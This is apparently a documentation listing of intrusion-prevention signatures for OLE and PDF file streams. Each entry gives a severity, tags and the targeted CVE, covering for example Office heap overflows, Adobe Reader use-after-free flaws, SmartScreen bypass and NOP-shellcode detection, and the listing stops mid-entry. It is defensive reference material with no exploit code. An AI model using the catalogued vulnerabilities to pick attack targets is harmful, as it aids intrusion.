Back to top

File-OLE_Microsoft-WPS-Converter-Heap-Overflow-Vulnerability

About this situation: An attempt to exploit Microsoft Office vulnerability CVE-2012-0177
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Microsoft Works, MS2012-04, CVE2012, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-446-4219
Vulnerability: Microsoft-WPS-Converter-Heap-Overflow-Vulnerability
Description:
Back to top

File-OLE_Microsoft_Outlook_Use_After_Free_Vulnerability_CVE-2019-1199

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2019-08, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1181-5242
Vulnerability: Microsoft_Outlook_Use_After_Free_Vulnerability_CVE-2019-1199
Description:
Back to top

File-OLE_Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2019-0885

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2019-05, CVE2019, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1159-5242
Vulnerability: Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2019-0885
Description:
Back to top

File-OLE_Microsoft_Word_Out_Of_Bound_Write_Vulnerability_CVE-2019-1201

About this situation: An attempt to exploit a vulnerability in Microsoft Word detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Word, MS2019-08, CVE2019, Windows not specific, Microsoft Word not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1182-5242
Vulnerability: Microsoft_Word_Out_Of_Bound_Write_Vulnerability_CVE-2019-1201
Description:
Back to top

File-OLE_Mozilla-Installation-File-Detected

About this situation: A Mozilla Installation File has been detected.
Context: OLE File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-1361-5242
Last changed: sgpkg-ips-1361-5242
Description:
Back to top

File-OLE_Null-Class-Id

About this situation: OLE file with a null Class ID download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Office-BMP-Integer-Overflow-CVE-2009-2518

About this situation: An OLE file that contains a malicious embedded BMP image targeting CVE-2009-2518 over HTTP detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office XP, MS2009-10, CVE2009, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Office-BMP-Integer-Overflow-CVE-2009-2518
Description:
Back to top

File-OLE_Office-Macro-Document

About this situation: An Office document with macros detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Office-Macro-Document
Description:
Back to top

File-OLE_OpenOffice-MS-Word-File-Processing-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in OpenOffice.org OpenOffice detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-471-5211
Vulnerability: OpenOffice.org-Microsoft-Word-File-Processing-Integer-Underflow
Description:
Back to top

File-OLE_OpenOffice-OLE-File-Stream-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenOffice detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2008, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-925-5242
Vulnerability: OpenOffice-OLE-File-Stream-Buffer-Overflow
Description:
Back to top

File-OLE_Oracle-Fusion-Middleware-Outside-In-Excel-File-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: Oracle-Fusion-Middleware-Outside-In-Excel-File-Parsing-Integer-Overflow
Description:
Back to top

File-OLE_Oracle-Outside-In-Excel-Gelframe-Officeartreclen-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1118-5242
Last changed: sgpkg-ips-1118-5242
Vulnerability: Oracle-Outside-In-Excel-Gelframe-Officeartreclen-Out-Of-Bounds-Read
Description:
Back to top

File-OLE_Oracle-Outside-In-Excel-Gelframe-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, CVE2018, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1618-5242
Vulnerability: Oracle-Outside-In-Excel-Gelframe-Out-Of-Bounds-Read
Description:
Back to top

File-OLE_Oracle-Outside-In-Excel-Propertysetstream-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Oracle Outside In Technology detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Oracle Outside In Technology, CVE2018, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1104-5242
Last changed: sgpkg-ips-1662-5242
Vulnerability: Oracle-Outside-In-Excel-Propertysetstream-Out-Of-Bounds-Write
Description:
Back to top

File-OLE_Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101

About this situation: An attempt to exploit a vulnerability in Perl Spreadsheet::ParseExcel detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Barracuda ESG, Perl, CVE2023, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1705-5242
Last changed: sgpkg-ips-1705-5242
Vulnerability: Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101
Description:
Back to top

File-OLE_Php-OLE-File-Handling-Infinite-Loop

About this situation: An attempt to exploit a vulnerability in PHP Group PHP detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, PHP, CVE2014, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Php-OLE-File-Handling-Infinite-Loop
Description:
Back to top

File-OLE_Poster-Software-Publish-It-Pui-File-Processing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Poster Software PUBLISH-iT detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Poster Software PUBLISH-iT, CVE2014, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-565-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Poster-Software-Publish-It-Pui-File-Processing-Buffer-Overflow
Description:
Back to top

File-OLE_PowerShell-In-Office-Document

About this situation: Traces of powershell references in OLE-file
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, Windows not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1010-5242
Last changed: sgpkg-ips-1243-5242
Vulnerability: PowerShell-In-Office-Document
Description:
Back to top

File-OLE_Shared-Variables

About this situation: This fingerprint sets shared variables
Context: OLE File Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1776-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

File-OLE_Siemens-Tecnomatix-Plant-Simulation-Spp-File-Parsing-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Siemens Tecnomatix Plant Simulation detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Siemens Tecnomatix Plant Simulation, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1625-5242
Last changed: sgpkg-ips-1625-5242
Vulnerability: Siemens-Tecnomatix-Plant-Simulation-Spp-File-Parsing-Stack-Buffer-Overflow
Description:
Back to top

File-OLE_SmartScreen-Security-warning-Bypass-For-MSI-Files-CVE-2023-24880

About this situation: An attempt to exploit a vulnerability in SmartScreen detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, SmartScreen, MS2023-03, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1565-5242
Last changed: sgpkg-ips-1565-5242
Vulnerability: SmartScreen-Security-warning-Bypass-For-MSI-Files-CVE-2023-24880
Description:
Back to top

File-OLE_Softmaker-Office-Planmaker-Excel-Sst-Record-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in SoftMaker Office PlanMaker detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SoftMaker Office PlanMaker, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Vulnerability: Softmaker-Office-Planmaker-Excel-Sst-Record-Buffer-Overflow
Description:
Back to top

File-OLE_Softmaker-Office-Planmaker-Pmd-Document-0x8010-Record-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in SoftMaker Office PlanMaker detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SoftMaker Office PlanMaker, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Vulnerability: Softmaker-Office-Planmaker-Pmd-Document-0x8010-Record-Out-Of-Bounds-Write
Description:
Back to top

File-OLE_Softmaker-Office-Planmaker-Pmd-Document-Records-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in SoftMaker Office PlanMaker detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SoftMaker Office PlanMaker, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1324-5242
Last changed: sgpkg-ips-1324-5242
Vulnerability: Softmaker-Office-Planmaker-Pmd-Document-Records-Integer-Overflow
Description:
Back to top

File-OLE_Sophos-Anti-Virus-Visio-File-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Sophos Anti-Virus detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sophos Anti-Virus, Sophos MailMonitor, Sophos Pure Message, CVE2005, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-870-5242
Vulnerability: Sophos-Anti-Virus-Visio-File-Parsing-Buffer-Overflow
Description:
Back to top

File-OLE_Suspicious-Author-Field-In-Microsoft-OLE-Compound-File

About this situation: Suspicious Author field in Microsoft OLE compound file
Context: OLE File Stream
Severity: 7
Tags: Windows 98, Windows 98 SE, Windows ME, Windows 2000 SP3, Windows 2000 SP4, x86, MS2005-05, CVE2005, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Windows-Explorer-Web-View-Script-Execution
Description:
Back to top

File-OLE_Suspicious-File

About this situation: An attempt to exploit a vulnerability in Microsoft Office detected
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-561-5211
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-OLE_Unknown-Class-Id

About this situation: OLE file with unknown Class ID download detected
Context: OLE File Stream
Severity: 2
Tags: Windows, Any Hardware, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: File-Type-Identification
Description:
Back to top

File-OLE_Unusual-Directory-Structure

About this situation: Detected a download of a suspicious OLE Structured Storage file
Context: OLE File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Microsoft Office, Any Operating System not specific, Microsoft Office not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Microsoft-OLE-Structured-Storage-File-Transfer
Description:
Back to top

File-OLE_Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Outlook, MS2023-05, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Vulnerability: Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
Description:
Back to top

File-OLE_Windows-Shell-Graphics-Thumbnail-Image-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2011-02, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-432-4219
Vulnerability: Microsoft-Windows-Shell-Graphics-Thumbnail-Image-Integer-Overflow
Description:
Back to top

File-OLE_Windows-URL-Zone-Check-Bypass-CVE-2023-29324

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-05, CVE2023, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1585-5242
Last changed: sgpkg-ips-1620-5242
Vulnerability: Windows-URL-Zone-Check-Bypass-CVE-2023-29324
Description:
Back to top

File-OLE_Windows-URL-Zone-Check-Bypass-CVE-2023-35384

About this situation: An attempt to exploit a vulnerability in Windows detected
Context: OLE File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-08, CVE2023, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1619-5242
Last changed: sgpkg-ips-1619-5242
Vulnerability: Windows-URL-Zone-Check-Bypass-CVE-2023-35384
Description:
Back to top

File-OLE_x86-X41nop-Shellcode

About this situation: Shellcode x41 nop detected
Context: OLE File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-432-4219
Last changed: sgpkg-ips-432-4219
Vulnerability: Shellcode-Encoder
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Addfield-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat Reader
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1370-5242
Last changed: sgpkg-ips-1370-5242
Vulnerability: Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Addfield-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-buttonGetIcon-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1388-5242
Last changed: sgpkg-ips-1392-5242
Vulnerability: Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-buttonGetIcon-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Deleteitemat-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1392-5242
Vulnerability: Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Deleteitemat-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Field-Format-Action-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1396-5242
Last changed: sgpkg-ips-1396-5242
Vulnerability: Adobe-Acrobat-And-Acrobat-Reader-Dc-Acroform-Field-Format-Action-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat DC detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1330-5242
Last changed: sgpkg-ips-1330-5242
Vulnerability: Adobe-Acrobat-And-Acrobat-Reader-Heap-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Acrobat-Reader-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat DC detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Vulnerability: Adobe-Acrobat-And-Acrobat-Reader-Information-Disclosure
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow

About this situation: A malicious PDF file targeted to exploit an integer overflow vulnerability in Adobe Acrobat and Adobe Reader products over HTTP detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow-2

About this situation: A malicious PDF file targeted to exploit an integer overflow vulnerability in Adobe Acrobat and Adobe Reader products over HTTP detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Adobe-Reader-U3D-Rhadobemeta-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: Adobe-Acrobat-And-Adobe-Reader-U3D-Rhadobemeta-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Acroform-Encoding-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-998-5242
Last changed: sgpkg-ips-998-5242
Vulnerability: Adobe-Acrobat-And-Reader-Acroform-Encoding-Code-Execution
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Acroform-Font-Encoding-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1019-5242
Last changed: sgpkg-ips-1019-5242
Vulnerability: Adobe-Acrobat-And-Reader-Acroform-Font-Encoding-Code-Execution
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Acroform-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2015 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2020, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1250-5242
Vulnerability: Adobe-Acrobat-And-Reader-Acroform-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Addannot-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-975-5242
Last changed: sgpkg-ips-975-5242
Vulnerability: Adobe-Acrobat-And-Reader-Addannot-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Dc-Acroform-Buttongetcaption-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 (Classic) detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Vulnerability: Adobe-Acrobat-And-Reader-Dc-Acroform-Buttongetcaption-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Docid-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1049-5242
Last changed: sgpkg-ips-1050-5242
Vulnerability: Adobe-Acrobat-And-Reader-Docid-Stack-Buffer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Escript-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2015 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2020, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1248-5242
Last changed: sgpkg-ips-1248-5242
Vulnerability: Adobe-Acrobat-And-Reader-Escript-Out-Of-Bounds-Read
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Form-Field-Format-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2020, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1363-5242
Vulnerability: Adobe-Acrobat-And-Reader-Form-Field-Format-Use-After-Free
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat DC (Classic) detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-844-5242
Vulnerability: Adobe-Acrobat-And-Reader-Jpeg2000-Out-Of-Bounds-Read
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-15953

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat or Acrobat Reader detected
Context: PDF File Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1111-5242
Last changed: sgpkg-ips-1111-5242
Vulnerability: Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-15953
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4949

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2018, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1073-5242
Last changed: sgpkg-ips-1073-5242
Vulnerability: Adobe-Acrobat-And-Reader-Jpeg2000-Parsing-Out-Of-Bounds-Read-CVE-2018-4949
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-PDF-XML-Stylesheet-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat 2017 detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2019, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1143-5242
Vulnerability: Adobe-Acrobat-And-Reader-PDF-XML-Stylesheet-Information-Disclosure
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat and Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1152-5242
Last changed: sgpkg-ips-1258-5242
Vulnerability: Adobe-Acrobat-And-Reader-Remote-Code-Execution
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-U3D-Uninitialized-Variable

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat and Reader detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Adobe-Acrobat-And-Reader-U3D-Uninitialized-Variable
Description:
Back to top

File-PDF_Adobe-Acrobat-And-Reader-Xfa-Oneofchild-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: PDF File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2013, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-522-5211
Vulnerability: Adobe-Acrobat-And-Reader-Xfa-Oneofchild-Remote-Code-Execution
Description:
Back to top

File-PDF_Adobe-Acrobat-Cooltype-Sing-Buffer-Overflow

